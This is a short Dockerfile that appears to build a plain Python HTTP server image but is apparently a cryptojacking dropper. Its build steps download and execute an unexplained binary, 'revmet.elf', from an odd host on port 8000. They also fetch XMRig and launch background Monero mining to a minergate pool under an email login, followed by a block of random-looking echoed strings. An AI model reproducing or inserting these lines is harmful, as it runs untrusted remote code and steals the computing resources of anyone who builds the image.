FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo spsgM7AAe5o27ltYxM7q3gp7U0mh8Dqn 7Ou4NPtAyToKvDag24qIfFQ8GY6dtuek UaUkW5aOE3S8V61sy5hHbg7ecwenJL8d og1XGINme8W0LHVaQ3Rm2Ra6h6van4uR DEkVI4hq0bwpcuWCI8JvwSErnjY0ccOp mLZ2eVFlTAgwpiK7fxu3Xn4QG2SAaADk kLcomvA08GuDQSiDc0OkW4Jr2jBemSo2 q88oBhKY5qaWtPCA8tjFlQuwvpCHggKu tUkExY3aVJc8AIHDNfV98my667PaZ5gi RAyWMoV0GPR6O0lBGZ6jQ5zoHozoamJZ DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]